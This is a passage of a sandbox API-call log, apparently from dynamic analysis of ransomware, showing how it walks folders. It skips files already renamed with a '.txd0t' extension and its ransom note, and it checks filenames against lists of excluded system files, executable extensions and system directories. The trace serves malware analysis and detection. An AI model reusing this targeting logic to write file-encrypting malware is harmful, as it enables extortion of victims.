ftLastWriteTime.dwLowDateTime=0x5848a111, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.295] StrCmpW (psz1="..", psz2=".") returned 1 [0116.295] StrCmpW (psz1="..", psz2="..") returned 0 [0116.295] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5839765f, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x5839765f, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5839765f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0116.295] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0116.295] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0116.295] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1040", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1040") returned="C:\\588bce7c90097ed212\\1040" [0116.296] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1040", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1040\\") returned="C:\\588bce7c90097ed212\\1040\\" [0116.296] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1040\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1040\\!TXDOT_READ_ME!.txt") returned="C:\\588bce7c90097ed212\\1040\\!TXDOT_READ_ME!.txt" [0116.296] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0116.296] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0116.296] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0116.296] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0116.296] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0116.296] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0116.296] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0116.296] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0116.296] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0116.296] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0116.296] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0116.296] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0116.296] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0116.296] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0116.296] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0116.296] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0116.296] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x5839765f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x103b, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf.txd0t", cAlternateFileName="EULART~1.TXD")) returned 1 [0116.296] StrCmpW (psz1="eula.rtf.txd0t", psz2=".") returned 1 [0116.296] StrCmpW (psz1="eula.rtf.txd0t", psz2="..") returned 1 [0116.296] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1040", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1040") returned="C:\\588bce7c90097ed212\\1040" [0116.296] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1040", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1040\\") returned="C:\\588bce7c90097ed212\\1040\\" [0116.296] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1040\\", psz2="eula.rtf.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1040\\eula.rtf.txd0t") returned="C:\\588bce7c90097ed212\\1040\\eula.rtf.txd0t" [0116.296] PathFindExtensionW (pszPath="eula.rtf.txd0t") returned=".txd0t" [0116.296] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0116.296] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5847b11e, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x13abc, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml.txd0t", cAlternateFileName="LOCALI~1.TXD")) returned 1 [0116.296] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2=".") returned 1 [0116.296] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2="..") returned 1 [0116.296] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1040", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1040") returned="C:\\588bce7c90097ed212\\1040" [0116.296] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1040", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1040\\") returned="C:\\588bce7c90097ed212\\1040\\" [0116.296] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1040\\", psz2="LocalizedData.xml.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml.txd0t") returned="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml.txd0t" [0116.296] PathFindExtensionW (pszPath="LocalizedData.xml.txd0t") returned=".txd0t" [0116.296] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0116.297] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0116.297] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0116.297] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0116.297] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1040", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1040") returned="C:\\588bce7c90097ed212\\1040" [0116.297] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1040", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1040\\") returned="C:\\588bce7c90097ed212\\1040\\" [0116.297] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1040\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1040\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1040\\SetupResources.dll" [0116.297] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0116.297] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0116.297] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0116.297] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0116.297] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0116.297] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0116.297] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0116.297] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0116.297] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0116.297] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0116.297] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0116.297] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0116.297] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0116.297] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0116.297] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0116.297] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0116.297] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0116.297] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0116.297] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0116.297] FindClose (in: hFindFile=0xec2030 | out: hFindFile=0xec2030) returned 1 [0116.297] GetProcessHeap () returned 0xe30000 [0116.297] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68410a0 | out: hHeap=0xe30000) returned 1 [0116.297] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x585ab28c, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x585ab28c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1041", cAlternateFileName="")) returned 1 [0116.297] StrCmpW (psz1="1041", psz2=".") returned 1 [0116.297] StrCmpW (psz1="1041", psz2="..") returned 1 [0116.297] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0116.298] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0116.298] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1041", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1041") returned="C:\\588bce7c90097ed212\\1041" [0116.298] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch="\\windows\\system32\\") returned 0x0 [0116.298] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch="\\windows\\syswow64\\") returned 0x0 [0116.298] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch="\\windows\\system\\") returned 0x0 [0116.298] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch="\\windows\\winsxs\\") returned 0x0 [0116.298] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch="\\appdata\\roaming\\") returned 0x0 [0116.298] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch="\\appdata\\local\\") returned 0x0 [0116.298] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch="\\appdata\\locallow\\") returned 0x0 [0116.298] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch="\\all users\\microsoft\\") returned 0x0 [0116.298] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch="\\inetpub\\logs\\") returned 0x0 [0116.298] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch=":\\boot\\") returned 0x0 [0116.298] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch=":\\perflogs\\") returned 0x0 [0116.298] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch=":\\programdata\\") returned 0x0 [0116.298] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch=":\\drivers\\") returned 0x0 [0116.298] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch=":\\wsus\\") returned 0x0 [0116.298] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch=":\\efstmpwp\\") returned 0x0 [0116.298] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch=":\\$recycle.bin\\") returned 0x0 [0116.298] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch="crypt_detect") returned 0x0 [0116.298] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch="cryptolocker") returned 0x0 [0116.298] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch="ransomware") returned 0x0 [0116.298] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch="C:\\WINDOWS") returned 0x0 [0116.298] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch="C:\\Program Files (x86)") returned 0x0 [0116.298] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch="C:\\Program Files") returned 0x0 [0116.298] GetProcessHeap () returned 0xe30000 [0116.298] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0x68410a0 [0116.298] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1041", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1041") returned="C:\\588bce7c90097ed212\\1041" [0116.298] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1041", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1041\\*") returned="C:\\588bce7c90097ed212\\1041\\*" [0116.298] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1041\\*", lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x585ab28c, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x585ab28c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2030 [0116.299] StrCmpW (psz1=".", psz2=".") returned 0 [0116.299] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x585ab28c, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x585ab28c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.299] StrCmpW (psz1="..", psz2=".") returned 1 [0116.299] StrCmpW (psz1="..", psz2="..") returned 0 [0116.299] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x584901ff, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x584901ff, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x584c6483, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0116.299] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0116.299] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0116.299] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1041", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1041") returned="C:\\588bce7c90097ed212\\1041" [0116.299] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1041", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1041\\") returned="C:\\588bce7c90097ed212\\1041\\" [0116.299] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1041\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1041\\!TXDOT_READ_ME!.txt") returned="C:\\588bce7c90097ed212\\1041\\!TXDOT_READ_ME!.txt" [0116.299] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0116.299] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0116.299] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0116.299] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0116.299] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0116.299] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0116.299] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0116.299] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0116.299] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0116.299] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0116.299] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0116.299] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0116.299] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0116.299] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0116.299] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0116.299] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0116.299] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x585ab28c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x298d, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf.txd0t", cAlternateFileName="EULART~1.TXD")) returned 1 [0116.299] StrCmpW (psz1="eula.rtf.txd0t", psz2=".") returned 1 [0116.299] StrCmpW (psz1="eula.rtf.txd0t", psz2="..") returned 1 [0116.299] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1041", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1041") returned="C:\\588bce7c90097ed212\\1041" [0116.299] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1041", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1041\\") returned="C:\\588bce7c90097ed212\\1041\\" [0116.299] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1041\\", psz2="eula.rtf.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1041\\eula.rtf.txd0t") returned="C:\\588bce7c90097ed212\\1041\\eula.rtf.txd0t" [0116.299] PathFindExtensionW (pszPath="eula.rtf.txd0t") returned=".txd0t" [0116.299] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0116.299] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5847c4b7, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x10c82, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml.txd0t", cAlternateFileName="LOCALI~1.TXD")) returned 1 [0116.300] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2=".") returned 1 [0116.300] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2="..") returned 1 [0116.300] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1041", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1041") returned="C:\\588bce7c90097ed212\\1041" [0116.300] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1041", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1041\\") returned="C:\\588bce7c90097ed212\\1041\\" [0116.300] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1041\\", psz2="LocalizedData.xml.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml.txd0t") returned="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml.txd0t" [0116.300] PathFindExtensionW (pszPath="LocalizedData.xml.txd0t") returned=".txd0t" [0116.300] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0116.300] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3d58, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0116.300] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0116.300] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0116.300] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1041", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1041") returned="C:\\588bce7c90097ed212\\1041" [0116.300] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1041", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1041\\") returned="C:\\588bce7c90097ed212\\1041\\" [0116.300] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1041\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1041\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1041\\SetupResources.dll" [0116.300] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0116.300] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0116.300] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0116.300] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0116.300] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0116.300] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0116.300] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0116.300] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0116.300] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0116.300] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0116.300] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0116.300] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0116.300] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0116.300] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0116.300] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0116.300] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0116.300] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0116.300] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0116.300] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3d58, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0116.300] FindClose (in: hFindFile=0xec2030 | out: hFindFile=0xec2030) returned 1 [0116.301] GetProcessHeap () returned 0xe30000 [0116.301] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68410a0 | out: hHeap=0xe30000) returned 1 [0116.301] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x586c4a47, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x586c4a47, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1042", cAlternateFileName="")) returned 1 [0116.301] StrCmpW (psz1="1042", psz2=".") returned 1 [0116.301] StrCmpW (psz1="1042", psz2="..") returned 1 [0116.301] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0116.301] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0116.301] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1042", cchMax=1068 | out: 